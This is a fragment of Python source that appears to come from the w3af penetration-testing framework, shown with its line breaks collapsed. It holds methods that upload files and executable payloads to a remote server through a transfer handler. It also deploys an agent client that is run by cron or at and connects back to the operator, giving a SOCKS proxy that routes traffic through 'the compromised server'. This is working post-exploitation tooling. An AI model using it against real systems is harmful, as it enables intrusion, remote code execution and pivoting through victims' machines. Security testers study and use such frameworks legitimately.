def write(self, remote_filename, file_content): ''' Write a the contents of the parameter "file_content" to the "remote_filename" file in the remote filesystem. @param remote_filename: The filename where to write the file_content @param file_content: The string to write in the remote file @return: The message to show to the user. ''' if not self._transfer_handler: # Get the fastest transfer method ptf = payloadTransferFactory( self.execute ) self._transfer_handler = ptf.getTransferHandler() if not self._transfer_handler.canTransfer(): return 'Failed to transfer, the transfer handler failed.' else: estimatedTime = self._transfer_handler.estimateTransferTime( len(file_content) ) om.out.debug('The file transfer will take "' + str(estimatedTime) + '" seconds.') self._transfer_handler.transfer( file_content, remote_filename ) om.out.debug('Finished file transfer.') return 'File upload was successful.'
def _send_exe_to_server(self, exe_file): """ This method should be implemented according to the remote operating system. The idea here is to send the exe_file to the remote server and save it in a file. @param exe_file: The local path to the executable file @return: The name of the remote file that was uploaded. """ om.out.debug("Called _send_exe_to_server()") om.out.console("Wait while w3af uploads the payload to the remote server...") ptf = payloadTransferFactory(self._exec_method) # Now we get the transfer handler wait_time_for_extrusion_scan = ptf.estimateTransferTime() transferHandler = ptf.getTransferHandler() if not transferHandler.canTransfer(): raise w3afException("Can't transfer the file to remote host, canTransfer() returned False.") else: om.out.debug("The transferHandler can upload files to the remote end.") estimatedTime = transferHandler.estimateTransferTime(len(exe_file)) om.out.debug('The payload transfer will take "' + str(estimatedTime) + '" seconds.') self._remote_filename = getRemoteTempFile(self._exec_method) om.out.debug('Starting payload upload, remote filename is: "' + self._remote_filename + '".') if transferHandler.transfer(file(exe_file).read(), self._remote_filename): om.out.console('Finished payload upload to "%s"' % self._remote_filename) return self._remote_filename else: raise w3afException("The payload upload failed, remote md5sum is different.")
def run( self ): ''' Entry point for the whole process. ''' # First, I have to check if I have a good w3afAgentClient to send to the # other end... try: interpreter, client_code, extension = self._select_client() except w3afException: om.out.error('Failed to find a suitable w3afAgentClient for the remote server.') else: # # Get a port to use. Extrusion scan or any other method is applied here. # inbound_port = self._getinbound_port() # # Start the w3afAgentServer on this machine # agent_server = w3afAgentServer( self._ip_address, socks_port=self._socks_port, listen_port=inbound_port ) self._agent_server = agent_server agent_server.start2() # Wait for it to start. time.sleep(0.5) if not agent_server.isRunning(): om.out.error( agent_server.getError() ) else: # # Now that everything is setup here, transfer the client # to the remote end and run it. # ptf = payloadTransferFactory( self._exec_method ) transferHandler = ptf.getTransferHandler( inbound_port ) if not transferHandler.canTransfer(): raise w3afException('Can\'t transfer w3afAgent client to remote host, canTransfer() returned False.') else: # Let the user know how much time it will take to transfer the file estimatedTime = transferHandler.estimateTransferTime( len(client_code) ) om.out.debug('The w3afAgent client transfer will take "' + str(estimatedTime) + '" seconds.') filename = getRemoteTempFile( self._exec_method ) filename += '.' + extension # Upload the file and check integrity om.out.console('Starting w3afAgent client upload, remote filename is: "%s" ...' % filename) upload_success = transferHandler.transfer( client_code, filename ) if not upload_success: raise w3afException('The w3afAgent client failed to upload. Remote file hash does NOT match.') om.out.console('Finished w3afAgent client upload!') # And now start the w3afAgentClient on the remote server using cron / at self._delayedExecution( interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str( inbound_port ) ) # # This checks if the remote server connected back to the agent_server # if not agent_server.isWorking(): om.out.console('Something went wrong, the w3afAgent client failed to connect back.') else: msg = 'A SOCKS proxy is listening on %s:%s' % (self._ip_address,self._socks_port) msg += ' , all connections made through this daemon will be routed ' msg += ' through the compromised server. We recommend using the proxychains tool ' msg += ' ("apt-get install proxychains") to route connections through the proxy, the ' msg += ' proxy configuration should look like "socks4 %s %s"' % (self._ip_address, self._socks_port) om.out.console( msg )